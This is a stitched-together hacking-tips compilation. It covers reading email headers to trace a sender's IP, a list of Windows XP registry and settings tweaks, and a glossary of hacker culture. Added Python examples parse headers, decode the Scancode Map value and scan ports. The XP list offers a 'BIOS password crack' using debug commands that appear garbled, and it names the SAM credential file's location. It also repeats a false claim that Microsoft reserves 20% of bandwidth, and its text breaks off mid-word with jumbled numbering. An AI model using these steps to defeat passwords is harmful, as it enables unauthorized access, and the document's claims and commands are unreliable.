Hotmail headers: [screenshot not reproduced]

In this case the IP address of the sender is [68.34.60.59]. Jump to step 9.

6. If you find a header with Received: from followed by a Gmail proxy like this:

Hotmail headers: [screenshot not reproduced]

Look for Received: from followed by the IP address within square brackets [].


In this case, the IP address of the sender is [69.140.7.58]. Jump to step 9.

7. Or else, if you have headers like this:

Hotmail headers: [screenshot not reproduced]

Look for Received: from followed by the IP address within square brackets []. In this case, the IP address of the sender is [61.83.145.129] (spam mail). Jump to step 9.

8. If you have multiple Received: from headers, eliminate the ones that have proxy.anyknownserver.com.

9. Track the IP address of the sender
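The three procedures above all reduce to the same header-reading rule: prefer an explicit X-Originating-IP header, otherwise walk the Received: chain from the sender's end and skip the provider's own relays. Here is that rule as a small Python script. It is an added example, not part of the original tutorial; the header samples and the PROVIDER_RELAY_MARKERS list are constructed for illustration (RFC 5737 documentation addresses), not real mail.

```python
"""Pick out the likely originating IP address from raw e-mail headers.

Added example; it is not part of the original tutorial. The header samples
below are constructed for illustration and use RFC 5737 documentation
addresses. PROVIDER_RELAY_MARKERS is an assumed list of relay hostnames to
skip, in the spirit of the tutorial's step 8.
"""
import re
from email import message_from_string
from email.message import Message
from typing import List, Optional

# Any dotted-quad IPv4 address, bracketed or not.
IPV4 = re.compile(r"\d{1,3}(?:\.\d{1,3}){3}")
# The same address between square brackets, as Received: headers write it.
BRACKETED_IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")

# Hostnames of the mail provider's own relays (constructed list). Hops whose
# "from" clause names one of these are skipped, as the tutorial's step 8 says.
PROVIDER_RELAY_MARKERS = ("proxy.anyknownserver.com",)


def from_clause(received_value: str) -> Optional[str]:
    """Return the 'from ...' part of a Received: header, or None if the hop
    has no 'from' clause (webmail hops read 'by ... with HTTP')."""
    flat = " ".join(received_value.split())  # unfold continuation lines
    if not flat.startswith("from "):
        return None
    return flat.split(" by ", 1)[0]  # drop the receiving server's name/IP


def received_hops_oldest_first(msg: Message) -> List[str]:
    """Servers prepend Received: headers, so the last one is the oldest hop."""
    return list(reversed(msg.get_all("Received", [])))


def sender_ip(raw_headers: str) -> Optional[str]:
    """Apply the tutorial's rules: X-Originating-IP if present, otherwise the
    first non-relay 'from' hop counted from the sender's side."""
    msg = message_from_string(raw_headers)
    xoip = msg.get("X-Originating-IP")
    if xoip:
        m = IPV4.search(xoip)
        if m:
            return m.group(0)
    for hop in received_hops_oldest_first(msg):
        clause = from_clause(hop)
        if clause is None:
            continue
        if any(marker in clause.lower() for marker in PROVIDER_RELAY_MARKERS):
            continue
        m = BRACKETED_IPV4.search(clause)
        if m:
            return m.group(1)
    return None


# Constructed samples (RFC 5737 addresses), one per case in the tutorial.
HOTMAIL_STYLE = """\
X-Originating-IP: [198.51.100.7]
Received: from mail.example.org ([203.0.113.9]) by mx.example.net; Mon, 1 Jan 2007 10:00:02 +0000
From: alice@example.org
To: bob@example.net
Subject: constructed sample

"""

RELAYED = """\
Received: from proxy.anyknownserver.com ([203.0.113.5])
 by mx.example.net with SMTP; Mon, 1 Jan 2007 10:00:02 +0000
Received: from [192.0.2.10] (helo=sender-pc)
 by proxy.anyknownserver.com with ESMTP; Mon, 1 Jan 2007 10:00:01 +0000
From: alice@example.org
To: bob@example.net
Subject: constructed sample

"""

WEBMAIL = """\
Received: from mail-relay.example.org (mail-relay.example.org [198.51.100.20])
 by mx.example.net with ESMTP; Mon, 1 Jan 2007 10:00:03 +0000
Received: by 10.1.2.3 with HTTP; Mon, 1 Jan 2007 10:00:01 +0000
From: alice@example.org
To: bob@example.net
Subject: constructed sample

"""

if __name__ == "__main__":
    for name, sample in (("Hotmail-style", HOTMAIL_STYLE), ("relayed", RELAYED), ("webmail", WEBMAIL)):
        print(f"{name}: {sender_ip(sample)}")
```

A caveat worth keeping in mind when reading the result: each Received: line is written by the server that accepted the message, so only the hops stamped by servers you trust are reliable, and a sender can prepend fake Received: lines of their own. Reading from the oldest hop is a starting point for an investigation, not proof.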


Hacking XP

Now let's play with Windows XP

How to Find a Lost File in your computer?

To find a missing file, first select the 'Start' button (bottom left-hand corner of your screen), then from the Start menu that opens select 'Find', then 'Files or Folders'.

When the 'Find: All Files' dialog box opens you are ready to find that missing file. If you did a simple search for all '.doc' files ('.doc' being the Microsoft Word file suffix) you may bring up hundreds of Microsoft Word files. To narrow your search, if you can remember part of the file name, e.g. 'jim' when the full name may be 'Jim Burns quote 2.5.02.doc', you will get fewer results.

To make a partial-word search, type the word in the 'Named' field followed by an asterisk (*, typed with 'Shift + 8') to stand for the missing words or letters, e.g. 'jim*.doc'. You can use * before or after the partial word or letters.

By default your hard drive will be selected in the 'Look in' field. To start your search press the 'Find Now' button and the results will be listed below.

To make your search quicker, if you save all your files inside your 'My Documents' folder, select it in the 'Look in' field when you open the 'Find: All Files' dialog box. By selecting the 'My Documents' folder your computer only searches it instead of your whole hard drive.


1) XP hides some system software you might want to remove, such as Windows Messenger, but you can tickle it and make it disgorge everything. Using Notepad or Edit, edit the text file /windows/inf/sysoc.inf, search for the word 'hide' and remove it. You can then go to Add or Remove Programs in the Control Panel, select Add/Remove Windows Components and there will be your prey, exposed and vulnerable.

2) Creating a Shutdown Icon or One-Click Shutdown:

3) Navigate to your desktop. On the desktop, right-click and go to New, then to Shortcut (in other words, create a new shortcut). You should now see a pop-up window instructing you to enter a command line path. Use this path in "Type Location of the Item":

SHUTDOWN -s -t 01

4) If the C: drive is not your local hard drive, then replace "C" with the correct letter of the hard drive. Click the "Next" button. Name the shortcut and click the "Finish" button. Now whenever you want to shut down, just click on this shortcut and you're done.

5) Increasing Bandwidth By 20%:

6) Microsoft reserves 20% of your available bandwidth for their own purposes like Windows Updates and interrogating your PC, etc. To get it back: click Start, then Run, and type "gpedit.msc" without quotes. This opens the Group Policy editor. Then go to: Local Computer Policy, then Computer Configuration, then Administrative Templates, then Network, then QoS Packet Scheduler, and then Limit Reservable Bandwidth.

7) Making Folders Private:

Open My Computer. Double-click the drive where Windows is installed (usually drive C:, unless you have more than one drive on your computer). If the contents of the drive are hidden, under System Tasks, click Show the contents of this drive. Double-click the Documents and Settings folder. Double-click your user folder. Right-click any folder in your user profile, and then click Properties. On the Sharing tab, select the Make this folder private so that only I have access to it check box.

8) To change Drive Letters:

Go to Start > Control Panel > Administrative Tools > Computer Management, Disk Management, then right-click the partition whose name you want to change


(click in the white area just below the word "Volume") and select "Change Drive Letter and Paths." From here you can add, remove or change drive letters and paths to the partition.

9) Removing the Shortcut arrow from Desktop Icons:

Go to Start, then Run, and enter regedit. Navigate to HKEY_CLASSES_ROOT\lnkfile. Delete the IsShortcut registry value. You may need to restart Windows XP.

10) Get Drivers for your Devices:

Visit Windows Update (XP only). Look at the left-hand pane and under Other Options click Personalize Windows Update. Now in the right-hand pane check the box Display the link to the Windows Update Catalog under See Also. Below Choose which categories and updates to display on Windows Update, make sure you check all the boxes you want shown. Click Save Settings. Now look in the left-hand pane under See Also, click Windows Update Catalog and choose what you're looking for. Choose either MS updates or drivers for hardware devices. Start the Wizard and off you go.

11) Customize Internet Explorer's Title Bar:

Open the Registry by going to Start, then Run, and entering regedit. Navigate to HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main. In the right-hand panel look for the string "Window Title" and change its value to whatever custom text you want to see.

12) Disabling the use of the Win Key:

If you are a gaming freak then you must be sick of the Win key on your keyboard. To disable use of the Win key, open the registry by going to Start, then Run, and entering regedit. Navigate to [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout]. In this key look for the value "Scancode Map". It's binary data, so be extra careful: set its value to "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00" to disable the Win key.
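Because the Scancode Map value is raw binary, it helps to see what the bytes in the tip actually encode before writing them. The following Python decodes and rebuilds the value. It is an added example, not from the original tips; SCANCODE_NAMES is a constructed lookup of a few common scancodes for readable output. The layout it assumes (two zero DWORDs, a DWORD entry count that includes the terminator, one little-endian DWORD per remapping with the replacement scancode in the low word and the original scancode in the high word, then a zero DWORD) is the documented REG_BINARY format of that value.

```python
r"""Decode and rebuild the Windows 'Scancode Map' registry value.

Added example, not part of the original tips list. The value lives under
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Keyboard Layout, as the
tip says. Layout: two zero header DWORDs, a DWORD entry count that includes
the terminator, one DWORD per remapping holding <new scancode><original
scancode> as little-endian words, then a zero DWORD. SCANCODE_NAMES is a
constructed lookup of a few scancodes, used only for readable output.
"""
import struct
from typing import Dict, List, Tuple

SCANCODE_NAMES: Dict[int, str] = {
    0x0000: "<disabled>",
    0xE05B: "Left Windows",
    0xE05C: "Right Windows",
    0xE05D: "Application (menu)",
    0x003A: "Caps Lock",
}

# (original scancode, scancode it is replaced with); 0x0000 disables the key.
Mapping = Tuple[int, int]


def parse_scancode_map(blob: bytes) -> List[Mapping]:
    """Return the remappings encoded in a Scancode Map blob, validating the layout."""
    if len(blob) < 16 or len(blob) % 4:
        raise ValueError("blob must be at least 16 bytes and DWORD aligned")
    version, flags, count = struct.unpack_from("<III", blob, 0)
    if version or flags:
        raise ValueError("header and flags DWORDs are expected to be zero")
    if 12 + 4 * count != len(blob):
        raise ValueError(f"entry count {count} does not match a {len(blob)}-byte blob")
    if blob[-4:] != b"\x00\x00\x00\x00":
        raise ValueError("missing zero terminator")
    mappings: List[Mapping] = []
    for i in range(count - 1):  # the count includes the terminator
        new_code, orig_code = struct.unpack_from("<HH", blob, 12 + 4 * i)
        mappings.append((orig_code, new_code))
    return mappings


def build_scancode_map(mappings: List[Mapping]) -> bytes:
    """Inverse of parse_scancode_map; produces a blob ready for a REG_BINARY write."""
    out = struct.pack("<III", 0, 0, len(mappings) + 1)
    for orig_code, new_code in mappings:
        out += struct.pack("<HH", new_code, orig_code)
    return out + b"\x00\x00\x00\x00"


def describe(blob: bytes) -> List[str]:
    """Human-readable 'original -> replacement' lines for each remapping."""
    return [
        f"{SCANCODE_NAMES.get(o, hex(o))} -> {SCANCODE_NAMES.get(n, hex(n))}"
        for o, n in parse_scancode_map(blob)
    ]


def to_reg_hex(blob: bytes) -> str:
    """Format a blob the way the tip quotes it (space-separated hex bytes)."""
    return " ".join(f"{b:02X}" for b in blob)


# The exact value quoted in the tip above.
DISABLE_WIN_KEYS_HEX = (
    "00 00 00 00 00 00 00 00 03 00 00 00 00 00 5B E0 00 00 5C E0 00 00 00 00"
)
DISABLE_WIN_KEYS = bytes.fromhex(DISABLE_WIN_KEYS_HEX)

if __name__ == "__main__":
    for line in describe(DISABLE_WIN_KEYS):
        print(line)
```

Decoding the tip's value yields two entries, each mapping a Windows key (E0 5B and E0 5C) to scancode 0000, that is, disabled. The same decoder is useful when reviewing a machine: a Scancode Map that remaps keys rather than disabling them persists across logons and is worth explaining before it is left in place.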

13) Restarting Windows without Restarting the Computer:

When you click on the SHUTDOWN button, make sure to simultaneously press the SHIFT key. If you hold the Shift key down while clicking


on the SHUTDOWN button, Windows would restart without restarting the computer. This is equivalent to the term "HOT REBOOT".

14) Stopping XP from displaying the unread messages count on the Welcome Screen:

To stop XP from displaying the count of unread messages, open the registry and navigate to [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\UnreadMail] and look for the data key "MessageExpiryDays". If you do not see this key, create a DWORD key named "MessageExpiryDays". Setting its value to 0 stops Windows XP from displaying the count of unread messages.

15) Adding the Administrative Tools Icon To The Desktop:

Open Registry Editor. In Registry Editor, navigate to the following registry key: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Desktop\NameSpace. Create the following key: {D20EA4E1-3957-11d2-A40B-0C5020524153} (just copy/paste, including the brackets). Close Registry Editor. There is no need to reboot. Just wait a few seconds and see how the icon appears.

16) Creating The Suspend Shortcut:

Right-click on the Desktop > New > Shortcut. Enter rundll32.exe PowrProf.dll,SetSuspendState. Give it whatever name you want. Now when you click on that shortcut, your computer will shut down and suspend.

17) Disable XP Load Screen:

By disabling the load screen you can boost the boot-up time by a couple of seconds, if not more. To disable the load screen, open the "msconfig" utility: go to Start > Run, type in "msconfig" without quotes and press Enter. In the subsequent window, select the 'boot.ini' tab. Check the /NOGUIBOOT option and press 'Apply'. Restart Windows to see the effect.

18) To Remove Arrow Signs From Desktop Shortcuts:

Open the registry editor by going to Start, then Run, and entering regedit. Once in the registry, navigate to the key HKEY_CLASSES_ROOT\lnkfile\ and rename the string value IsShortcut to AriochIsShortcut.

19) Make Your Internet Explorer As Fast As Firefox:

Open the registry editor by going to Start, then Run, and entering regedit. Once in the registry, navigate to the key


HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings. Right-click in the right-hand pane > New > DWORD. Type MaxConnectionsPerServer and set its value (the higher the number, the better the speed, e.g. 99). Create another DWORD and type MaxConnectionsPer1_0Server, then put a high value as mentioned above. Restart IE and you are done.

20) Disable Disk Performance Counters:

Win XP comes with many inbuilt performance monitoring applications that constantly examine various parts of the system. This information can be of real use to a system administrator for collecting performance statistics. However, for a home user these statistics hold no value, and since the monitoring happens all the time, it consumes a good deal of system resources. "Disk monitoring", for example, happens in the background, and turning it off is advisable if you will not be using the performance monitoring applications. To turn it off, type "diskperf -N" at a command prompt. To bring up the command prompt: go to Start > Run, type "cmd" and press [Enter].

21) Removing Multiple Boot Screens:

If you are getting unwanted multiple boot screens, follow these steps.

1> Right-click on My Computer

2> Select Properties

3> Select the Advanced tab

4> Select Settings in the Startup & Recovery section (3rd group)

5> Select the operating system which you want.

6> Click OK.

7> Press Settings again and click on Edit.

8> It will open the boot.ini file.

9> Now you can delete those operating systems which you don't want to be displayed.

Note: For deleting operating systems from the boot.ini file, keep in mind that you can't delete the OS which is selected by default there. Before making any changes, make a copy of the boot.ini file.

22) Enabling Hibernation:


Go to Display Properties > Screen Saver > Power > Hibernate. Check 'Enable Hibernation'. Press the Shift key after you click 'Turn Off Computer' in the Start menu.

23) To Increase the Internet Speed:

Open Notepad and paste the code below into it.

[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters]

"SackOpts"=dword:00000001

"TcpWindowSize"=dword:0005ae4c

"Tcp1323Opts"=dword:00000003

"DefaultTTL"=dword:00000040

"EnablePMTUBHDetect"=dword:00000000

"EnablePMTUDiscovery"=dword:00000001

"GlobalMaxTcpWindowSize"=dword:0005ae4c

Now save this file as speed.reg. Execute it and observe the change!

24) Changing Your Dynamic IP Address:

1. Click on "Start" in the bottom left hand corner of screen

2. Click on "Run"

3. Type in "command" and hit okay

4. Type "ipconfig /release" just like that, and hit "enter"

5. Type "exit" and leave the prompt

6. Right-click on "Network Places" or "My Network Places" on your desktop.

7. Click on "properties"

8. Right click on "Local Area Connection" and click "properties"

9. Double-click on the "Internet Protocol (TCP/IP)" from the list under the

"General" tab

10. Click on "Use the following IP address" under the "General" tab

11. Create an IP address (it doesn't matter what it is; I just type 1 and 2 until it fills the area up).

11. Press "Tab" and it should automatically fill in the "Subnet Mask" section with

default numbers.

12. Hit the "ok" button here

13. Hit the "ok" button again


14. Right-click back on "Local Area Connection" and go to properties again.

16. Go back to the "TCP/IP" settings

17. This time, select "Obtain an IP addres

25) BIOS PASSWORD CRACK

1)Boot up windows from CD.

2)Go to dos prompt or go to command prompt directly from the windows start up

menu.

3)Type the command at the prompt:"debug"(without quotes)

4)Type the following lines now exactly as given...

07010

07120

quit

exit

4)Exit from the dos prompt and restart the machine.

PASSWORD PROTECTION IS GONE.

Just make your backup.

26) Where is the Windows XP administrator password saved?

C:/WINDOWS/SYSTEM32/CONFIG/SAM

27)

Windows 2000 Workstation's log-in screen has a "Shutdown" button which you can use to shut down the system without ever logging in. But you can disable Windows 2000 Workstation's "Shutdown" button on the initial log-in screen:

Run "RegEdit.exe" or "RegEdt32.exe"

Select the following key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\


CurrentVersion\Winlogon

Add a value named "ShutdownWithoutLogon" of type "REG_SZ" and set it to "0".

Restart Windows

28) Adding a Shortcut Key to Your Internet Connection

To add items when you right-click on the Start Button:

Start Regedit. Go to HKey_Classes_Root / Directory / Shell. Right-click on Shell and select New / Key. Type in the name of the key and press the Enter key. In the Default name that shows in the right-hand panel, you can add a title with a & character in front of the letter for a shortcut. Right-click on the key you just created and create another key under it called command. For the value of this command, enter the full path and program you want to execute. Now when you right-click on the Start Button, your new program will show up. You do not need to reboot first.


Glossary

Lexicon

A hacker is anyone who enjoys the intellectual challenge of creatively overcoming or circumventing limitations, primarily in their fields of interest, namely programming or electrical engineering. As will be discussed below, there is a trend in the popular press to use the term to describe computer criminals, and others whose motivations are less pure than the traditional hacker, a trend that greatly annoys many old-school computer/technology enthusiasts.

Origin of the term at MIT

The term originally developed at MIT long before computers became common; a "hack" meant a simple, but often inelegant, solution. The term hack came to refer to any clever prank perpetrated by MIT students; the perpetrator is a hacker. To this day the terms hack and hacker are used in that way at MIT, without necessarily referring to computers. When MIT students surreptitiously put a police car atop the dome on MIT's Building 10, that was a hack, and the students involved were therefore hackers. Computer culture at MIT developed when members of the Tech Model Railroad Club started working with a Digital Equipment Corporation PDP-1 computer and applied local model railroad slang to computers. In modern computer culture, the label "hacker" is a compliment, indicating a skilled and clever programmer. In the media, however, it has negative connotations and has become synonymous with "software cracker".

The term hacker is used in five senses in common use:

1. Someone who knows a (sometimes specified) set of programming interfaces well enough to write novel and useful software without conscious thought on a good day.

2. Someone who (usually illegally) attempts to break into or otherwise subvert the security of a program, system or network, often with malicious intent. This usage was annoying to many in the developer community who grew up with the primary meaning in sense (1), and preferred to keep it that way; they preferred the media used the term cracker. However this wound up causing even more problems, as simply creating a new word did nothing to dispel misconceptions. "Black hat hacker" is a phrase that wound up with the same problems as the word "cracker".

3. Someone who attempts to break into systems or networks in order to help the owners of the system by making them aware of security flaws in it. This is referred to by some as a "white hat hacker" or sneaker. Many of these people are employed by computer security companies, and are doing something completely legal; and many were formerly hackers within sense 2.

4. Someone who, through either knowledge or trial and error, makes a modification to an existing piece of software, made available to the hacker community, such that it provides a change of functionality. Such change is normally a benefit. Rather than a competition, the exchange of improvements is most often experienced as a cooperative learning effort.

5. A Reality Hacker or Urban Spelunker (origin: MIT); someone who enjoys exploring air ducts, rooftops, shafts and other hidden aspects of urban life, sometimes including pulling elaborate pranks for the enjoyment and entertainment of the community.

"Script kiddie" is reserved for a computer user of little or no skill who simply follows directions or uses a cook-book approach without fully understanding the meaning of the steps they are performing.

"h4x0r" (pronounced Hacks-Or) is a script kiddie in the context of a computer game (i.e. someone who uses a program to modify a game, giving them special and unfair advantages). "h4x0r" is often used jokingly or as a term of endearment between gamers.

Note that while the term hacker denotes competence, the noun hack often means kludge and thus has a negative connotation, while the verb hack generally shares the same competent connotations.

The hacker community (the set of people who would describe themselves as hackers, or who would be described by others as hackers) falls into at least three partially overlapping categories. The word hacker probably derives from the somewhat derogatory hack, used in the newspaper industry typically to refer to a journalist who types his stories without checking his facts first.


Hacker -- Brilliant Programmer

One who knows a (sometimes specified) set of programming interfaces well enough to write novel and useful software without conscious thought on a good day. This type of hacker is respected within the development community for the freedom they represent, although the term still carries some of the meaning of Hack, developing programs without adequate planning. This zugzwang sets freedom and the ability to be creative against methodical, careful progress. Corporate programming environments typically favor either the good hacker or the careful computer scientist, but not both. At their best, Hackers can be surprisingly productive. Industry standard rates of development are in the range of 6-10 lines of code (debugged and documented) per hour. A Hacker in stride can produce a few hundred or occasionally even thousands of lines of code an hour by leveraging their previous work. As a result a Hacker may be able to sketch out the full shape of a program, to a level of quality that can be used for demonstrating ideas, in less than a week. Thus it isn't hard to see what some companies find useful in Hacker talent. The down side of Hacker productivity is generally agreed to be in maintainability, documentation, and completion. Very talented hackers may become bored with a project once they have figured out all of the hard parts, and be unwilling to finish off the details. This attitude can cause friction in shops where other programmers are expected to pick up the half-finished work, decipher the structures and ideas, and bullet-proof the code. In other cases, where a Hacker is willing to maintain their own code, a company may be unable to find anyone else who is capable or willing to dig through the code to maintain the program if the original programmer moves on to a new job.

Hacker -- Computer Criminal


The popular press has been known to use the terms "hacker" and occasionally "cracker" for someone who attempts to break into or otherwise subvert the security of a system or network. Both usages are annoying to many in the developer community who grew up with the primary meaning of "hacker" in the Guru sense, and who don't see the problem solved by the invention of new and nebulous words like "cracker" or "black hat". Instead, there has been a move to define terms when describing these people. What makes someone a "hacker", a "computer criminal", or just a regular computer user? Once these details are known, the proper word (or combination) can be accurately applied. While it will always be possible to use one's "hacker" skills in a destructive way, this tends to go against the loosely defined hacker ethic. One can certainly use hacking skills to commit a crime. However, this means that this particular hacker is now a criminal, vandal, malicious user, etc., existing words that do a much better job of describing the person's actions than the nebulous "cracker". If a locksmith used his skills to break into a building, few would debate that he had crossed into the criminal world, and there would be no need to invent a word to define criminal or malicious locksmiths. The reason hackers face these kinds of problems is that the mass media tends to believe anyone who says they are a hacker - and people say they are hackers because of the mass media's sensationalist portrayals. This deceptive cycle will probably only come to an end with the education of reporters and the general public on what constitutes a hacker and what does not. A group known as the "Hacker Antidefamation League" has this goal.

But, indeed, it's likely that the confusion and dissonance exists precisely because "hacking" describes a *skill set* -- akin to picking locks -- whose tools can be used both ethically and unethically, by both people who are basically ethical and those who are not (these are two related, but separate distinctions -- what long-time system administrator has not violated a company policy by breaking into some company facility for an authorized user so that that person can complete an important project?). This may well be the crux of the argument, in fact: so-called 'white-hat' hackers are uncomfortable at the exposure of the darker side of their skill-set, notwithstanding the fact that, like comic-book superheroes, they only utilize those skills for Good.

Software cracking is the process of removing any sort of software-enforced protection scheme from a piece of software.

There are several recurring tools of the trade used by hackers to gain unauthorized access to computers:

Trojan horse


These are applications that seem to do useful work but set up a back door so that the hacker can later return and enter the system. They include programs that mimic login screens in order to capture the credentials typed into them. Viruses that fool a user into downloading and/or executing them by pretending to be useful applications are also sometimes called Trojan horses.

Snooper

Applications that capture passwords and other data while in transit, either within the computer or over the network.

Virus -- An application that propagates itself opportunistically by waiting in the background until the user offers it a new medium to infect. The term came into usage by comparison with biological viruses, which reproduce by infecting a cell and taking advantage of its life functions. Similarly, computer viruses, unlike worms, embed themselves within files on the host system. When "infected" executables run, or sometimes when infected binary data files are read, the virus is able to spread to other binary-format files on the local system, on floppy disks or over the network. Viruses are often confused with worms.

Worm -- An application that actively probes for known weaknesses across the network, then propagates itself by exploiting those weaknesses. The original Usenet post describing the Morris worm drew the distinction between viruses and worms thus: worms do not attach themselves to code. Popular usage appears to favour worms being more active than viruses. However, the Jargon File, as of version 4.4.1, maintains the original sense of the term. A worm in this original sense is any independent program that reproduces itself over a network (a program that reproduces itself on the local machine only, repeatedly, until the machine crashes is known as a wabbit). After the comparison between computer viruses and biological viruses, the obvious comparison here is to a bacterium.

Vulnerability Scanner

A tool used to quickly check computers on a network for known weaknesses. Hackers also use port scanners, which check which ports on a specified computer are "open", that is, accept connections and can therefore be used to reach a service running on the computer. An open port only tells the scanner that something is listening there; identifying which service it is, and whether that service is vulnerable, is the next step.
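A minimal port scanner, written for this edition as an added example (it is not code from the original document), shows what "checking whether a port is open" actually means: for each candidate port the scanner attempts a full TCP connect() and records whether the handshake completes. The throw-away listener on 127.0.0.1, the small port window around it and the freed-port helper are constructed scaffolding so the example runs offline; against a real target you would pass the host and port range of a system you are authorized to test.

```python
"""TCP connect() port scanner (added example, not from the original text).

Each probe tries to complete a TCP handshake with host:port.  A port is
reported "open" when connect() succeeds, i.e. something is listening.
To make the example self-contained it also starts a throw-away listener
on loopback so the scan has a known open port to find.
"""
import socket
from concurrent.futures import ThreadPoolExecutor
from typing import Dict, Iterable, List


def probe_port(host: str, port: int, timeout: float = 0.5) -> bool:
    """Return True if a TCP connect() to host:port succeeds.

    A closed port answers with RST and fails immediately; a filtered port
    (packets silently dropped by a firewall) only fails once the timeout
    expires.  Both surface as OSError (ConnectionRefusedError / timeout).
    """
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((host, port))
            return True
        except OSError:
            return False


def scan_ports(host: str, ports: Iterable[int], workers: int = 32) -> List[int]:
    """Probe the given ports concurrently and return the open ones, sorted.

    Concurrency matters because filtered ports each cost a full timeout.
    """
    port_list = list(ports)
    with ThreadPoolExecutor(max_workers=workers) as pool:
        results = pool.map(lambda p: (p, probe_port(host, p)), port_list)
    return sorted(p for p, is_open in results if is_open)


def start_local_listener() -> socket.socket:
    """Constructed scaffolding: a listening socket on an OS-chosen loopback port."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))
    srv.listen(5)
    return srv


def freed_loopback_port() -> int:
    """Constructed scaffolding: a loopback port that was just bound and released,
    so it is (almost certainly) closed and will refuse a connection."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.bind(("127.0.0.1", 0))
        return s.getsockname()[1]


def demo() -> Dict[str, object]:
    """Start a listener, scan a small window of ports around it, report the result."""
    srv = start_local_listener()
    try:
        listen_port = srv.getsockname()[1]
        # Keep the window inside the valid port range; neighbouring ephemeral
        # ports may legitimately be in use, so only the listener is guaranteed open.
        low = max(1, listen_port - 5)
        high = min(65535, listen_port + 5)
        open_ports = scan_ports("127.0.0.1", range(low, high + 1))
        return {"listen_port": listen_port, "open_ports": open_ports}
    finally:
        srv.close()


if __name__ == "__main__":
    result = demo()
    print(f"listener on 127.0.0.1:{result['listen_port']}")
    print("open ports in scanned window:", result["open_ports"])
```

A connect() scan completes the TCP handshake, so every probe shows up in the target's service logs and connection accounting; stealthier SYN scans send only the first packet of the handshake and need raw-socket privileges. The asymmetry between a refused port (instant RST) and a filtered one (silence until the timeout) is also why a scan of a firewalled host feels much slower than a scan of an unprotected one.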

Exploit -- A prepared application that takes advantage of a known weakness.

Social engineering -- Asking someone for the password or account (possibly over a beer). Also includes looking over someone's shoulder while they enter their password, or posing as someone else in order to get sensitive information.

Rootkit -- A toolkit for hiding the fact that a computer's security has been compromised. Rootkits may include replacements for system binaries (for example, the tools that list running processes) so that the applications being run by the intruder no longer appear in the active process tables. Because only the replaced tools lie, a view of the system obtained by other means, such as from a clean boot medium or by comparing the suspect tools' output against the raw system data they are supposed to report, can reveal the discrepancy.

Leet -- An English pidgin that helps to obscure hacker discussions and web sites and, paradoxically, simplifies the location of such resources in public search engines for those who know the language.

Hacker -- Grey Hat

1) A black-hat hacker turned white-hat. See below.

2) A white-hat hacker who uses black-hat techniques to satisfy their employers, for whom they act as a white hat.


Hacker -- White Hat

White hat hackers often overlap with black hats, depending on your perspective. The primary difference is that a white hat hacker observes the hacker ethic, a sort of golden rule of computing similar to: do unto others as you would have them do unto you. Like black hats, white hats are often intimately familiar with the internal details of security systems, and can delve into obscure machine code when needed to find a solution to a tricky problem without requiring support from a system manufacturer.

An example of a hack: Microsoft Windows ships with the ability to use cryptographic libraries built into the operating system. When shipped overseas this feature became nearly useless, because the operating system would refuse to load cryptographic libraries that had not been signed by Microsoft, and Microsoft would not sign a library unless the US Government authorized it for export. This allowed the US Government to maintain some perceived level of control over the use of strong cryptography beyond its borders. While hunting through the symbol table of a beta release of Windows, a couple of overseas hackers found a second key in the Microsoft binaries, used to verify the signatures on those libraries, which could be replaced with a key of their own. That is, without disabling the libraries that are included with Windows (even overseas), these individuals found a way to trick the operating system into loading a library that had not been signed by Microsoft, thus restoring the functionality that had been lost to non-US users. Whether this is good (white hat) or bad (black hat) may depend on whether you are the US Government or not, but it is generally considered by the computing community to be a white hat type of activity.

How Some Hackers Define Themselves

The following is the definition given by the Jargon File (a dictionary of hacker jargon), accepted by some (but not all) in the hacker community:

hacker n. [originally, someone who makes furniture with an axe]


1. A person who enjoys exploring the details of programmable systems and how to stretch their capabilities, as opposed to most users, who prefer to learn only the minimum necessary.

2. One who programs enthusiastically (even obsessively) or who enjoys programming rather than just theorizing about programming.

3. A person capable of appreciating hack value.

4. A person who is good at programming quickly.

5. An expert at a particular program, or one who frequently does work using it or on it; as in `a Unix hacker'. (Definitions 1 through 5 are correlated, and people who fit them congregate.)

6. An expert or enthusiast of any kind. One might be an astronomy hacker, for example.

7. One who enjoys the intellectual challenge of creatively overcoming or circumventing limitations.

8. [deprecated] A malicious meddler who tries to discover sensitive information by poking around. Hence `password hacker', `network hacker'. The correct term for this sense is cracker.

The term `hacker' also tends to connote membership in the global community defined by the net (see the network and Internet address). For discussion of some of the basics of this culture, see the How To Become A Hacker FAQ. It also implies that the person described is seen to subscribe to some version of the hacker ethic. It is better to be described as a hacker by others than to describe oneself that way. Hackers consider themselves something of an elite (a meritocracy based on ability), though one to which new members are gladly welcome. There is thus a certain ego satisfaction to be had in identifying yourself as a hacker (but if you claim to be one and are not, you'll quickly be labeled bogus). See also geek, wannabee. This term seems to have been first adopted as a badge in the 1960s by the hacker culture surrounding TMRC and the MIT AI Lab. We have a report that it was used in a sense close to this entry's by teenage radio hams and electronics tinkerers in the mid-1950s.


Notable Hackers

Richard Stallman -- A hacker of the old school, Stallman walked in off the street and got a job at MIT's Artificial Intelligence Lab in 1971. Stallman is a legendary hacker, the founder of the free software movement, a MacArthur "genius grant" recipient and a programmer capable of prodigious exploits.

Ken Thompson and Dennis Ritchie -- The driving creative force behind Bell Labs' legendary computer science operating group, Ritchie and Thompson created UNIX in 1969.

Steve Wozniak -- The co-founder of Apple Computer got his start making devices for phone phreaking.

Linus Torvalds -- Torvalds was a computer science student at the University of Helsinki when he wrote the Linux kernel in 1991.

Eric S. Raymond -- One of the founders of the Open Source Initiative, he wrote the famous text The Cathedral and the Bazaar and many other essays. He also maintains the Jargon File for the hacker culture, which was previously maintained by Guy L. Steele, Jr.

Larry Wall -- The creator of the Perl programming language.

